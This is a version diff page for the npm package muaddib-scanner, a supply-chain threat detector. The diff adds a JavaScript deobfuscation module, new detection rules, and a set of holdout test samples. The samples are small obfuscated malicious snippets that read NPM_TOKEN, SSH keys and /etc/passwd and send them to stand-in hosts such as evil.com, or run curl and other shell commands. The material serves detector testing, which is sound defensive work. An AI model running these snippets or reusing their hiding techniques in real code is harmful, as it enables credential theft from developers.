npm - muaddib-scanner - Versions diffs - 2.2.3 → 2.2.5 - Mend

muaddib-scanner 2.2.3 → 2.2.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (30) hide show

package/README.fr.md +1 -35
package/README.md +1 -35
package/bin/muaddib.js +6 -10
package/datasets/holdout-v4/atob-eval/index.js +2 -0
package/datasets/holdout-v4/atob-eval/package.json +5 -0
package/datasets/holdout-v4/base64-require/index.js +3 -0
package/datasets/holdout-v4/base64-require/package.json +5 -0
package/datasets/holdout-v4/charcode-fetch/index.js +3 -0
package/datasets/holdout-v4/charcode-fetch/package.json +5 -0
package/datasets/holdout-v4/charcode-spread-homedir/index.js +5 -0
package/datasets/holdout-v4/charcode-spread-homedir/package.json +5 -0
package/datasets/holdout-v4/concat-env-steal/index.js +4 -0
package/datasets/holdout-v4/concat-env-steal/package.json +5 -0
package/datasets/holdout-v4/double-decode-exfil/index.js +4 -0
package/datasets/holdout-v4/double-decode-exfil/package.json +5 -0
package/datasets/holdout-v4/hex-array-exec/index.js +3 -0
package/datasets/holdout-v4/hex-array-exec/package.json +5 -0
package/datasets/holdout-v4/mixed-obfuscation-stealer/index.js +10 -0
package/datasets/holdout-v4/mixed-obfuscation-stealer/package.json +5 -0
package/datasets/holdout-v4/nested-base64-concat/index.js +4 -0
package/datasets/holdout-v4/nested-base64-concat/package.json +5 -0
package/datasets/holdout-v4/template-literal-hide/index.js +3 -0
package/datasets/holdout-v4/template-literal-hide/package.json +5 -0
package/package.json +1 -1
package/src/index.js +6 -2
package/src/response/playbooks.js +5 -0
package/src/rules/index.js +13 -0
package/src/scanner/ast.js +107 -24
package/src/scanner/dataflow.js +18 -1
package/src/scanner/deobfuscate.js +557 -0

package/README.fr.md CHANGED Viewed

@@ -327,40 +327,6 @@ muaddib scan . --breakdown
 Affiche la décomposition explicable du score : contribution de chaque finding au score final, avec les poids par règle et multiplicateurs de sévérité.
-### API Threat Feed
-```bash
-muaddib feed [--limit N] [--severity LEVEL] [--since DATE]
-muaddib serve [--port N]
-```
-Exporte les détections sous forme de flux JSON pour intégration SIEM.
-- `muaddib feed` — Affiche le flux de menaces JSON sur stdout (filtrable par limit, sévérité, date)
-- `muaddib serve` — Démarre un serveur HTTP (port 3000 par défaut) avec `GET /feed` et `GET /health`
-```bash
-muaddib serve --port 8080
-# GET http://localhost:8080/feed?limit=50&severity=HIGH
-# GET http://localhost:8080/health
-```
-### Logging des temps de détection
-```bash
-muaddib detections [--stats] [--json]
-```
-Historique des détections avec timestamps de première observation et métriques de lead time (délai entre la détection MUAD'DIB et l'advisory publique).
-### Suivi du taux de faux positifs
-```bash
-muaddib stats [--daily] [--json]
-```
-Statistiques de scan : total scanné, clean, suspect, taux de faux positifs, nombre confirmé malveillant. Utilisez `--daily` pour le détail par jour.
 ### Replay ground truth
 ```bash
@@ -739,7 +705,7 @@ Output (CLI, JSON, HTML, SARIF, Webhook, Threat Feed)
 - **ADR** (Adversarial Detection Rate) : taux de detection sur 35 samples malveillants evasifs (4 vagues red team + holdout promu)
 - **Holdout** (pre-tuning) : taux de detection sur 10 samples jamais vus avant correction des regles (mesure de generalisation)
-Lancez `muaddib evaluate` pour reproduire ces metriques localement. Voir [Evaluation Methodology](docs/EVALUATION_METHODOLOGY.md) pour le protocole experimental complet.
+Voir [Evaluation Methodology](docs/EVALUATION_METHODOLOGY.md) pour le protocole experimental complet.
 ---

package/README.md CHANGED Viewed

@@ -327,40 +327,6 @@ muaddib scan . --breakdown
 Shows explainable score breakdown: how each finding contributes to the final risk score, with per-rule weights and severity multipliers.
-### Threat Feed API
-```bash
-muaddib feed [--limit N] [--severity LEVEL] [--since DATE]
-muaddib serve [--port N]
-```
-Export detections as a JSON threat feed for SIEM integration.
-- `muaddib feed` — Output threat feed JSON to stdout (filterable by limit, severity, date)
-- `muaddib serve` — Start an HTTP server (default port 3000) with `GET /feed` and `GET /health` endpoints
-```bash
-muaddib serve --port 8080
-# GET http://localhost:8080/feed?limit=50&severity=HIGH
-# GET http://localhost:8080/health
-```
-### Detection time logging
-```bash
-muaddib detections [--stats] [--json]
-```
-View detection history with first-seen timestamps and lead time metrics (time between MUAD'DIB detection and public advisory).
-### FP rate tracking
-```bash
-muaddib stats [--daily] [--json]
-```
-View scan statistics: total scanned, clean, suspect, false positive rate, confirmed malicious count. Use `--daily` for per-day breakdown.
 ### Ground truth replay
 ```bash
@@ -742,7 +708,7 @@ Output (CLI, JSON, HTML, SARIF, Webhook, Threat Feed)
 - **ADR** (Adversarial Detection Rate): detection rate on 35 evasive malicious samples across 4 red-team waves + promoted holdout
 - **Holdout** (pre-tuning): detection rate on 10 unseen samples before any rule correction (measures generalization)
-Run `muaddib evaluate` to reproduce these metrics locally. See [Evaluation Methodology](docs/EVALUATION_METHODOLOGY.md) for the full experimental protocol.
+See [Evaluation Methodology](docs/EVALUATION_METHODOLOGY.md) for the full experimental protocol.
 ---

package/bin/muaddib.js CHANGED Viewed

@@ -31,6 +31,7 @@ let temporalPublishMode = false;
 let temporalMaintainerMode = false;
 let temporalFullMode = false;
 let breakdownMode = false;
+let noDeobfuscate = false;
 let feedLimit = null;
 let feedSeverity = null;
 let feedSince = null;
@@ -110,6 +111,8 @@ for (let i = 0; i < options.length; i++) {
     temporalMaintainerMode = true;
   } else if (options[i] === '--breakdown') {
     breakdownMode = true;
+  } else if (options[i] === '--no-deobfuscate') {
+    noDeobfuscate = true;
   } else if (options[i] === '--temporal') {
     temporalMode = true;
   } else if (options[i] === '--limit') {
@@ -363,15 +366,6 @@ const helpText = `
     muaddib scrape                   Scrape new IOCs
     muaddib sandbox <pkg> [--strict] [--no-canary]  Analyze in isolated Docker container
     muaddib sandbox-report <pkg>     Sandbox + detailed network report
-    muaddib feed [options]            Threat feed (JSON)
-    muaddib serve [options]           Start threat feed HTTP server
-    muaddib detections               List recent detections
-    muaddib detections --stats       Show aggregated detection stats
-    muaddib detections --json        Raw JSON output
-    muaddib stats                    Show scan stats + FP rate
-    muaddib stats --daily            Last 7 days daily breakdown
-    muaddib stats --json             Raw JSON dump
-    muaddib evaluate                 Evaluate scanner effectiveness (TPR, FPR, ADR)
     muaddib version                  Show version
   Replay Options:
@@ -404,6 +398,7 @@ const helpText = `
     --temporal-maintainer  Detect maintainer changes (new maintainer, account takeover)
     --temporal-full     All temporal analyses (lifecycle + AST + publish + maintainer)
     --no-canary         Disable honey token injection in sandbox
+    --no-deobfuscate    Disable deobfuscation pre-processing
     --exclude [dir]     Exclude directory from scan (repeatable)
     --limit [n]         Limit feed entries (default: 50)
     --severity [level]  Filter by severity (CRITICAL|HIGH|MEDIUM|LOW)
@@ -444,7 +439,8 @@ if (command === 'version' || command === '--version' || command === '-v') {
     temporalMaintainer: temporalMaintainerMode || temporalFullMode,
     exclude: excludeDirs,
     entropyThreshold: entropyThreshold,
-    breakdown: breakdownMode
+    breakdown: breakdownMode,
+    noDeobfuscate: noDeobfuscate
   }).then(exitCode => {
     process.exit(exitCode);
   }).catch(err => {

package/datasets/holdout-v4/atob-eval/index.js ADDED Viewed

@@ -0,0 +1,2 @@
+// Holdout v4 — atob-eval: classic atob + eval payload
+eval(atob('Y29uc29sZS5sb2coInB3bmVkIik='));

package/datasets/holdout-v4/atob-eval/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "atob-eval",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/base64-require/index.js ADDED Viewed

@@ -0,0 +1,3 @@
+// Holdout v4 — base64-require: module name hidden in base64
+const mod = require(Buffer.from('Y2hpbGRfcHJvY2Vzcw==', 'base64').toString());
+mod.exec('whoami');

package/datasets/holdout-v4/base64-require/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "base64-require",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/charcode-fetch/index.js ADDED Viewed

@@ -0,0 +1,3 @@
+// Holdout v4 — charcode-fetch: URL rebuilt from charCodes
+const url = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 101, 118, 105, 108, 46, 99, 111, 109);
+fetch(url, { method: 'POST', body: process.env.NPM_TOKEN });

package/datasets/holdout-v4/charcode-fetch/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "charcode-fetch",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/charcode-spread-homedir/index.js ADDED Viewed

@@ -0,0 +1,5 @@
+// Holdout v4 — charcode-spread-homedir: module 'os' hidden via charCodes
+const h = String.fromCharCode(...[111, 115]);
+const m = require(h).homedir();
+const f = require('fs').readFileSync(m + '/.ssh/id_rsa');
+require('https').request('https://evil.com').write(f);

package/datasets/holdout-v4/charcode-spread-homedir/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "charcode-spread-homedir",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/concat-env-steal/index.js ADDED Viewed

@@ -0,0 +1,4 @@
+// Holdout v4 — concat-env-steal: env var name rebuilt by concat
+const key = 'NPM' + '_' + 'TOK' + 'EN';
+const val = process.env[key];
+require('https').request({ hostname: 'evil.com', path: '/steal', method: 'POST' }, () => {}).write(val);

package/datasets/holdout-v4/concat-env-steal/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "concat-env-steal",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/double-decode-exfil/index.js ADDED Viewed

@@ -0,0 +1,4 @@
+// Holdout v4 — double-decode-exfil: double base64 encoding
+const modName = Buffer.from(Buffer.from('WTJocGJHUmZjSEp2WTJWemN3PT0=', 'base64').toString(), 'base64').toString();
+const proc = require(modName);
+proc.exec('curl https://evil.com/exfil?data=$(cat /etc/passwd)');

package/datasets/holdout-v4/double-decode-exfil/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "double-decode-exfil",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/hex-array-exec/index.js ADDED Viewed

@@ -0,0 +1,3 @@
+// Holdout v4 — hex-array-exec: shell command hidden in hex array
+const cmd = [0x63, 0x75, 0x72, 0x6c, 0x20, 0x68, 0x74, 0x74, 0x70, 0x73, 0x3a, 0x2f, 0x2f, 0x65, 0x76, 0x69, 0x6c, 0x2e, 0x63, 0x6f, 0x6d].map(c => String.fromCharCode(c)).join('');
+require('child_process').exec(cmd);

package/datasets/holdout-v4/hex-array-exec/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "hex-array-exec",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/mixed-obfuscation-stealer/index.js ADDED Viewed

@@ -0,0 +1,10 @@
+// Holdout v4 — mixed-obfuscation-stealer: 3 techniques combined
+// Module name via charCode
+const modName = String.fromCharCode(102, 115);
+// Path via base64
+const credPath = Buffer.from('L2V0Yy9wYXNzd2Q=', 'base64').toString();
+// URL via concat
+const host = 'https://' + 'att' + 'acker' + '.com';
+const data = require(modName).readFileSync(credPath, 'utf8');
+require('https').request(host, { method: 'POST' }, () => {}).write(data);

package/datasets/holdout-v4/mixed-obfuscation-stealer/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "mixed-obfuscation-stealer",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/nested-base64-concat/index.js ADDED Viewed

@@ -0,0 +1,4 @@
+// Holdout v4 — nested-base64-concat: split base64 + concat
+const a = Buffer.from('Y2hpbGRf', 'base64').toString();
+const b = Buffer.from('cHJvY2Vzcw==', 'base64').toString();
+require(a + b).exec('id');

package/datasets/holdout-v4/nested-base64-concat/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "nested-base64-concat",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/template-literal-hide/index.js ADDED Viewed

@@ -0,0 +1,3 @@
+// Holdout v4 — template-literal-hide: module name via template literals
+const mod = `${'child'}${'_process'}`;
+require(mod).exec('curl evil.com');

package/datasets/holdout-v4/template-literal-hide/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "template-literal-hide",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.2.3",
+  "version": "2.2.5",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/src/index.js CHANGED Viewed

@@ -19,6 +19,7 @@ const { loadCachedIOCs } = require('./ioc/updater.js');
 const { ensureIOCs } = require('./ioc/bootstrap.js');
 const { scanEntropy } = require('./scanner/entropy.js');
 const { scanAIConfig } = require('./scanner/ai-config.js');
+const { deobfuscate } = require('./scanner/deobfuscate.js');
 const { detectSuddenLifecycleChange } = require('./temporal-analysis.js');
 const { detectSuddenAstChanges } = require('./temporal-ast-diff.js');
 const { detectPublishAnomaly } = require('./publish-anomaly.js');
@@ -222,6 +223,9 @@ async function run(targetPath, options = {}) {
     spinner.start(`[MUADDIB] Scanning ${targetPath}...`);
   }
+  // Deobfuscation pre-processor (pass to AST/dataflow scanners unless disabled)
+  const deobfuscateFn = options.noDeobfuscate ? null : deobfuscate;
   // Parallel execution of all independent scanners
   const [
     packageThreats,
@@ -240,11 +244,11 @@ async function run(targetPath, options = {}) {
   ] = await Promise.all([
     scanPackageJson(targetPath),
     scanShellScripts(targetPath),
-    analyzeAST(targetPath),
+    analyzeAST(targetPath, { deobfuscate: deobfuscateFn }),
     Promise.resolve(detectObfuscation(targetPath)),
     scanDependencies(targetPath),
     scanHashes(targetPath),
-    analyzeDataFlow(targetPath),
+    analyzeDataFlow(targetPath, { deobfuscate: deobfuscateFn }),
     scanTyposquatting(targetPath),
     Promise.resolve(scanGitHubActions(targetPath)),
     Promise.resolve(matchPythonIOCs(pythonDeps, targetPath)),

package/src/response/playbooks.js CHANGED Viewed

@@ -318,6 +318,11 @@ const PLAYBOOKS = {
     'Fichier binaire (.png/.jpg/.wasm) reference avec eval() dans le meme fichier. ' +
     'Technique de steganographie: le payload malveillant est cache dans les pixels d\'une image ou les sections d\'un WASM. ' +
     'Analyser le fichier binaire dans un sandbox. Verifier les donnees extraites avant execution.',
+  staged_eval_decode:
+    'CRITIQUE: eval() ou Function() recoit un argument decode en base64 (atob/Buffer.from). ' +
+    'Technique de staged payload: le code malveillant est encode puis decode et execute dynamiquement. ' +
+    'Isoler la machine. Decoder le payload manuellement pour analyser le code execute. Supprimer le package.',
 };
 function getPlaybook(threatType) {

package/src/rules/index.js CHANGED Viewed

@@ -585,6 +585,19 @@ const RULES = {
     mitre: 'T1027.003'
   },
+  staged_eval_decode: {
+    id: 'MUADDIB-AST-021',
+    name: 'Staged Eval Decode',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'eval() ou Function() recoit un argument decode (atob ou Buffer.from base64). Pattern classique de staged payload: le code malveillant est encode en base64 puis decode et execute dynamiquement.',
+    references: [
+      'https://attack.mitre.org/techniques/T1140/',
+      'https://attack.mitre.org/techniques/T1059/007/'
+    ],
+    mitre: 'T1140'
+  },
   env_charcode_reconstruction: {
     id: 'MUADDIB-AST-018',
     name: 'Environment Variable Key Reconstruction',

package/src/scanner/ast.js CHANGED Viewed

@@ -92,22 +92,22 @@ const SANDBOX_INDICATORS = [
   '/proc/self/cgroup'
 ];
-async function analyzeAST(targetPath) {
+async function analyzeAST(targetPath, options = {}) {
   const threats = [];
   const files = findJsFiles(targetPath);
   for (const file of files) {
     const relativePath = path.relative(targetPath, file).replace(/\\/g, '/');
     if (EXCLUDED_FILES.includes(relativePath)) {
       continue;
     }
     // Ignore files in dev folders
     if (isDevFile(relativePath)) {
       continue;
     }
     try {
       const stat = fs.statSync(file);
       if (stat.size > MAX_FILE_SIZE) continue;
@@ -119,8 +119,26 @@ async function analyzeAST(targetPath) {
     } catch {
       continue;
     }
+    // Analyze original code first (preserves obfuscation-detection rules)
     const fileThreats = analyzeFile(content, file, targetPath);
     threats.push(...fileThreats);
+    // Also analyze deobfuscated code for additional findings hidden by obfuscation
+    if (typeof options.deobfuscate === 'function') {
+      try {
+        const result = options.deobfuscate(content);
+        if (result.transforms.length > 0) {
+          const deobThreats = analyzeFile(result.code, file, targetPath);
+          const existingKeys = new Set(fileThreats.map(t => `${t.type}::${t.message}`));
+          for (const dt of deobThreats) {
+            if (!existingKeys.has(`${dt.type}::${dt.message}`)) {
+              threats.push(dt);
+            }
+          }
+        }
+      } catch { /* deobfuscation failed — skip */ }
+    }
   }
   return threats;
@@ -137,6 +155,34 @@ function hasOnlyStringLiteralArgs(node) {
   return node.arguments.every(arg => arg.type === 'Literal' && typeof arg.value === 'string');
 }
+/**
+ * Returns true when `node` is itself a base64-decode call expression, i.e. one of:
+ *   - atob(...)                               — any call whose callee is the identifier `atob`
+ *   - Buffer.from(x, 'base64').toString(...)  — `.toString` called directly on a `Buffer.from`
+ *     call that has at least two arguments, the second having the value 'base64'
+ * Used to detect staged eval/Function decode patterns.
+ *
+ * Only the node passed in is inspected; nested sub-expressions are not searched.
+ * The arguments of atob() are not examined, and any encoding other than the exact
+ * value 'base64' (for example 'base64url' or 'hex') does not match.
+ *
+ * @param {object} node - AST node to test; null, undefined and non-objects yield false
+ * @returns {boolean} true if the node matches one of the decode shapes above
+ */
+function hasDecodeArg(node) {
+  if (!node || typeof node !== 'object') return false;
+  // atob(...) — matched by callee name only; its arguments are not inspected
+  if (node.type === 'CallExpression' &&
+      node.callee?.type === 'Identifier' && node.callee.name === 'atob') {
+    return true;
+  }
+  // Buffer.from(<anything>, 'base64').toString() — second argument must have the value 'base64'
+  if (node.type === 'CallExpression' &&
+      node.callee?.type === 'MemberExpression' &&
+      node.callee.property?.name === 'toString') {
+    const inner = node.callee.object;
+    if (inner?.type === 'CallExpression' &&
+        inner.callee?.type === 'MemberExpression' &&
+        inner.callee.object?.name === 'Buffer' &&
+        inner.callee.property?.name === 'from' &&
+        inner.arguments?.length >= 2 &&
+        inner.arguments[1]?.value === 'base64') {
+      return true;
+    }
+  }
+  return false;
+}
 /**
  * Checks if an AST subtree contains decode patterns (base64, atob, fromCharCode).
  */
@@ -391,6 +437,23 @@ function analyzeFile(content, filePath, basePath) {
         }
       }
+      // Detect chained: require(non-literal).exec(...) — direct dynamic require + exec
+      if ((execName || memberExec) && node.callee.type === 'MemberExpression' &&
+          node.callee.object?.type === 'CallExpression') {
+        const innerCall = node.callee.object;
+        const innerName = getCallName(innerCall);
+        if (innerName === 'require' && innerCall.arguments.length > 0 &&
+            innerCall.arguments[0]?.type !== 'Literal') {
+          const method = execName || memberExec;
+          threats.push({
+            type: 'dynamic_require_exec',
+            severity: 'CRITICAL',
+            message: `${method}() chained on dynamic require() — obfuscated module + command execution.`,
+            file: path.relative(basePath, filePath)
+          });
+        }
+      }
       // Detect sandbox/container evasion: fs.accessSync('/.dockerenv'), fs.existsSync('/.dockerenv'), etc.
       if (node.callee.type === 'MemberExpression' && node.callee.property?.type === 'Identifier') {
         const fsMethod = node.callee.property.name;
@@ -608,27 +671,47 @@ function analyzeFile(content, filePath, basePath) {
       if (callName === 'eval') {
         hasEvalInFile = true;
-        const isConstant = hasOnlyStringLiteralArgs(node);
-        threats.push({
-          type: 'dangerous_call_eval',
-          severity: isConstant ? 'LOW' : 'HIGH',
-          message: isConstant
-            ? 'eval() with constant string literal (low risk, globalThis polyfill pattern).'
-            : 'Dangerous call "eval" with dynamic expression detected.',
-          file: path.relative(basePath, filePath)
-        });
+        // Detect staged eval decode: eval(atob(...)) or eval(Buffer.from(...).toString())
+        if (node.arguments.length === 1 && hasDecodeArg(node.arguments[0])) {
+          threats.push({
+            type: 'staged_eval_decode',
+            severity: 'CRITICAL',
+            message: 'eval() with decode argument (atob/Buffer.from base64) — staged payload execution.',
+            file: path.relative(basePath, filePath)
+          });
+        } else {
+          const isConstant = hasOnlyStringLiteralArgs(node);
+          threats.push({
+            type: 'dangerous_call_eval',
+            severity: isConstant ? 'LOW' : 'HIGH',
+            message: isConstant
+              ? 'eval() with constant string literal (low risk, globalThis polyfill pattern).'
+              : 'Dangerous call "eval" with dynamic expression detected.',
+            file: path.relative(basePath, filePath)
+          });
+        }
       } else if (callName === 'Function') {
-        const isConstant = hasOnlyStringLiteralArgs(node);
-        // Function() creates a new scope (unlike eval), so dynamic usage is MEDIUM not HIGH.
-        // Common in template engines (lodash, handlebars) and globalThis polyfills.
-        threats.push({
-          type: 'dangerous_call_function',
-          severity: isConstant ? 'LOW' : 'MEDIUM',
-          message: isConstant
-            ? 'Function() with constant string literal (low risk, globalThis polyfill pattern).'
-            : 'Function() with dynamic expression (template/factory pattern).',
-          file: path.relative(basePath, filePath)
-        });
+        // Detect staged Function decode: new Function(atob(...))
+        if (node.arguments.length >= 1 && hasDecodeArg(node.arguments[node.arguments.length - 1])) {
+          threats.push({
+            type: 'staged_eval_decode',
+            severity: 'CRITICAL',
+            message: 'Function() with decode argument (atob/Buffer.from base64) — staged payload execution.',
+            file: path.relative(basePath, filePath)
+          });
+        } else {
+          const isConstant = hasOnlyStringLiteralArgs(node);
+          // Function() creates a new scope (unlike eval), so dynamic usage is MEDIUM not HIGH.
+          // Common in template engines (lodash, handlebars) and globalThis polyfills.
+          threats.push({
+            type: 'dangerous_call_function',
+            severity: isConstant ? 'LOW' : 'MEDIUM',
+            message: isConstant
+              ? 'Function() with constant string literal (low risk, globalThis polyfill pattern).'
+              : 'Function() with dynamic expression (template/factory pattern).',
+            file: path.relative(basePath, filePath)
+          });
+        }
       }
     },

package/src/scanner/dataflow.js CHANGED Viewed

@@ -6,7 +6,7 @@ const { isDevFile, findJsFiles, getCallName } = require('../utils.js');
 const MAX_FILE_SIZE = 10 * 1024 * 1024; // 10MB
-async function analyzeDataFlow(targetPath) {
+async function analyzeDataFlow(targetPath, options = {}) {
   const threats = [];
   const files = findJsFiles(targetPath);
@@ -35,8 +35,25 @@ async function analyzeDataFlow(targetPath) {
       continue;
     }
+    // Analyze original code first (preserves obfuscation-detection rules)
     const fileThreats = analyzeFile(content, file, targetPath);
     threats.push(...fileThreats);
+    // Also analyze deobfuscated code for additional findings hidden by obfuscation
+    if (typeof options.deobfuscate === 'function') {
+      try {
+        const result = options.deobfuscate(content);
+        if (result.transforms.length > 0) {
+          const deobThreats = analyzeFile(result.code, file, targetPath);
+          const existingKeys = new Set(fileThreats.map(t => `${t.type}::${t.message}`));
+          for (const dt of deobThreats) {
+            if (!existingKeys.has(`${dt.type}::${dt.message}`)) {
+              threats.push(dt);
+            }
+          }
+        }
+      } catch { /* deobfuscation failed — skip */ }
+    }
   }
   return threats;

package/src/scanner/deobfuscate.js ADDED Viewed

@@ -0,0 +1,557 @@
+'use strict';
+const acorn = require('acorn');
+const walk = require('acorn-walk');
+/**
+ * Lightweight static deobfuscation pre-processor.
+ * Resolves common JS obfuscation patterns via AST rewriting (no eval).
+ *
+ * Phase 1 walks the AST and rewrites, directly in the source text:
+ *   1. '+' expressions that tryFoldConcat() can fold into one string
+ *   2. String.fromCharCode(...) calls whose arguments extractNumericArgs() accepts
+ *   3. Buffer.from('<b64>', 'base64').toString() and atob('<b64>') calls,
+ *      but only when isPrintable() accepts the decoded text
+ *   4. hex-array map/join chains resolved by tryResolveHexArrayMap()
+ * Overlapping replacements are reduced to the outermost one before being applied.
+ *
+ * Phase 2 (propagateConsts) runs only when phase 1 changed something; its
+ * transforms are appended after the phase-1 entries.
+ *
+ * If the source cannot be parsed it is returned unchanged with an empty
+ * `transforms` array, so `transforms.length > 0` tells the caller whether
+ * anything was rewritten.
+ *
+ * NOTE(review): phase-1 `start`/`end` are offsets into the original source;
+ * phase-2 offsets presumably refer to the phase-1 output instead — confirm
+ * against propagateConsts before relying on them.
+ *
+ * @param {string} sourceCode — raw JS source
+ * @returns {{ code: string, transforms: Array<{type: string, start: number, end: number, before: string, after: string}> }}
+ */
+function deobfuscate(sourceCode) {
+  const transforms = [];
+  // Parse AST — if parsing fails, return source unchanged (fail-safe)
+  let ast;
+  try {
+    ast = acorn.parse(sourceCode, {
+      ecmaVersion: 2024,
+      sourceType: 'module',
+      allowHashBang: true,
+      ranges: true
+    });
+  } catch {
+    return { code: sourceCode, transforms };
+  }
+  // Collect replacements as { start, end, value, type, before }
+  const replacements = [];
+  walk.simple(ast, {
+    // ---- 1. STRING CONCAT FOLDING ----
+    // 'ch' + 'il' + 'd_' + 'process' → 'child_process'
+    BinaryExpression(node) {
+      if (node.operator !== '+') return;
+      const folded = tryFoldConcat(node);
+      if (folded === null) return;
+      // NOTE(review): both branches below are empty, so this conditional has no effect.
+      if (node.left.type === 'Literal' && node.right.type === 'Literal' &&
+          typeof node.left.value === 'string' && typeof node.right.value === 'string') {
+        // Simple two-literal concat — always fold
+      } else if (node.type === 'BinaryExpression') {
+        // Nested concat — inner and outer nodes both record a replacement here;
+        // the de-duplication pass after the walk keeps only the outermost range.
+      }
+      const before = sourceCode.slice(node.start, node.end);
+      const after = quoteString(folded);
+      replacements.push({
+        start: node.start,
+        end: node.end,
+        value: after,
+        type: 'string_concat',
+        before
+      });
+    },
+    // ---- 2. CHARCODE REBUILD + 3. BASE64 DECODE ----
+    CallExpression(node) {
+      // String.fromCharCode(99, 104, 105, 108, 100) → "child"
+      if (isStringFromCharCode(node)) {
+        const nums = extractNumericArgs(node);
+        if (nums === null) return;
+        try {
+          const decoded = String.fromCharCode(...nums);
+          const before = sourceCode.slice(node.start, node.end);
+          const after = quoteString(decoded);
+          replacements.push({
+            start: node.start,
+            end: node.end,
+            value: after,
+            type: 'charcode',
+            before
+          });
+        } catch { /* invalid char codes — skip */ }
+        return;
+      }
+      // Buffer.from('...', 'base64').toString() → decoded string
+      if (isBufferBase64ToString(node)) {
+        const b64str = extractBufferBase64Arg(node);
+        if (b64str === null) return;
+        try {
+          const decoded = Buffer.from(b64str, 'base64').toString();
+          // Sanity: only replace if isPrintable() accepts the decoded text
+          if (!isPrintable(decoded)) return;
+          const before = sourceCode.slice(node.start, node.end);
+          const after = quoteString(decoded);
+          replacements.push({
+            start: node.start,
+            end: node.end,
+            value: after,
+            type: 'base64',
+            before
+          });
+        } catch { /* decode failure — skip */ }
+        return;
+      }
+      // atob('...') → decoded string (decoded through Buffer as UTF-8; recorded with type 'base64')
+      if (isAtobCall(node)) {
+        const b64str = node.arguments[0]?.value;
+        if (typeof b64str !== 'string') return;
+        try {
+          const decoded = Buffer.from(b64str, 'base64').toString();
+          if (!isPrintable(decoded)) return;
+          const before = sourceCode.slice(node.start, node.end);
+          const after = quoteString(decoded);
+          replacements.push({
+            start: node.start,
+            end: node.end,
+            value: after,
+            type: 'base64',
+            before
+          });
+        } catch { /* skip */ }
+        return;
+      }
+      // ---- 4. HEX ARRAY MAP ----
+      // [0x63, 0x68, ...].map(c => String.fromCharCode(c)).join('')
+      const hexResult = tryResolveHexArrayMap(node, sourceCode);
+      if (hexResult !== null) {
+        replacements.push(hexResult);
+      }
+    }
+  });
+  // De-duplicate: nested nodes produce overlapping replacements.
+  // Sort by start ascending, widest first, then keep only the outermost replacement of each overlap.
+  replacements.sort((a, b) => a.start - b.start || b.end - a.end);
+  const filtered = [];
+  let lastEnd = -1;
+  for (const r of replacements) {
+    if (r.start < lastEnd) continue; // nested inside a wider replacement — skip
+    filtered.push(r);
+    lastEnd = r.end;
+  }
+  // Apply replacements from end to start so earlier offsets stay valid while splicing
+  filtered.sort((a, b) => b.start - a.start);
+  let code = sourceCode;
+  for (const r of filtered) {
+    code = code.slice(0, r.start) + r.value + code.slice(r.end);
+    transforms.push({
+      type: r.type,
+      start: r.start,
+      end: r.end,
+      before: r.before,
+      after: r.value
+    });
+  }
+  // Reverse transforms so they're in source order (start ascending)
+  transforms.reverse();
+  // ---- PHASE 2: CONST PROPAGATION ----
+  // If phase 1 produced transforms, re-parse and propagate const string assignments.
+  // const a = 'child_'; const b = 'process'; require(a + b) → require('child_' + 'process') → require('child_process')
+  if (transforms.length > 0) {
+    const phase2 = propagateConsts(code);
+    if (phase2.transforms.length > 0) {
+      code = phase2.code;
+      transforms.push(...phase2.transforms);
+    }
+  }
+  return { code, transforms };
+}
/**
 * Phase 2: Propagate const string literal assignments into identifier references,
 * then fold any resulting string concatenations.
 *
 * The analysis is name-based, not scope-aware, so it is deliberately conservative.
 * A name is only propagated when:
 *   - it is declared with `const` and initialised with a string literal,
 *   - it appears as a binding/assignment target exactly once in the whole file
 *     (so shadowing parameters, inner declarations and re-declarations in other
 *     scopes disable propagation instead of producing a wrong value),
 *   - it is never the operand of `++` / `--`.
 *
 * @param {string} sourceCode - JavaScript source to rewrite.
 * @returns {{code: string, transforms: Array<{type: string, start: number, end: number, before: string, after: string}>}}
 *   The rewritten code and the list of applied transforms. `const_propagation`
 *   offsets refer to `sourceCode`; offsets of transforms produced by
 *   `foldConcatsOnly` refer to the code after propagation. If the source cannot
 *   be parsed, or nothing can be propagated, the input is returned unchanged
 *   with an empty transform list.
 */
function propagateConsts(sourceCode) {
  const transforms = [];
  let ast;
  try {
    ast = acorn.parse(sourceCode, {
      ecmaVersion: 2024,
      sourceType: 'module',
      allowHashBang: true,
      ranges: true
    });
  } catch {
    // Unparseable input: leave it untouched rather than guessing.
    return { code: sourceCode, transforms };
  }

  // name -> string value of its `const` initialiser
  const constMap = new Map();
  // name -> number of times it appears as a binding or assignment target
  const bindingCounts = new Map();
  // names that are assigned or updated somewhere (not safe to propagate)
  const reassigned = new Set();
  // every identifier used in expression position
  const references = [];
  // start offsets of identifiers that are not variable references
  const propPositions = new Set();
